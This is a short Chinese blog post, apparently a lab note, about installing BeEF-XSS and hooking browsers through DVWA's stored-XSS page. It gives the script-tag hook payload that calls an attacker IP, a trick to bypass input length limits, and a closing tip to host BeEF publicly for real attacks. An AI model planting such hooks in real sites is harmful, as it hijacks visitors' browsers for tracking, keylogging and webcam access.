beef

BeEF-XSS是一款非常强大的web框架攻击平台，集成了许多payload，可以实现许多功能
BeEF-XSS可以说是最强大的XSS漏洞利用工具，可以收集浏览器信息、键盘记录、社会工程等

总之就是使用beef这个工具来利用xss漏洞的

beef安装

我在kail虚拟机上安装的，很简单的在终端输入一句命令sudo apt setup beef-xss，然后安装成功设置密码就行了，因为之后在浏览器打开需要登陆，登陆名beef，密码就是安装时设置的那个

beef打开

在终端输入命令beef-xss就可以使用beef了

在浏览器输入http://127.0.0.1:3000/ui/panel，输入登录名密码就可以打开beef，此时什么都没有

beef使用

首先需要一个存在xss漏洞的网站，我这里用的dvwa，在dvwa的xss-store就存在xss漏洞，记得难度设置为low。

找到xss漏洞点，我们就开始利用了。

beef利用漏洞是使用叫“钩子的js代码”,就是在xss漏洞的输入框输入<script src="http://192.168.1.4:3000/hook.js"></script>,代码中的ip地址是攻击者的ip地址。

这个代码太长了，输入框输入长度有限制，按f12，找到长度代码，修改长度范围，就可以输入代码了。

输入后，点击提交，就可以坐等受害者访问这个网站。

受害者访问后，我们的beef界面就会出现受害者ip地址及详细信息（在details里）

我们还可以点击commands，向目标受害机发送命令，如出现弹框，跳转页面，打开摄像头等等。

但是我这里实验有问题，因为我只有一个电脑，之后实验了有问题再更新...

2021.5.24更新-----

上边的ip地址都是内网ip，但是在实际攻击中，需要把BeEF搭建在自己的外网服务器上，然后就可以填自己的外网ip地址了。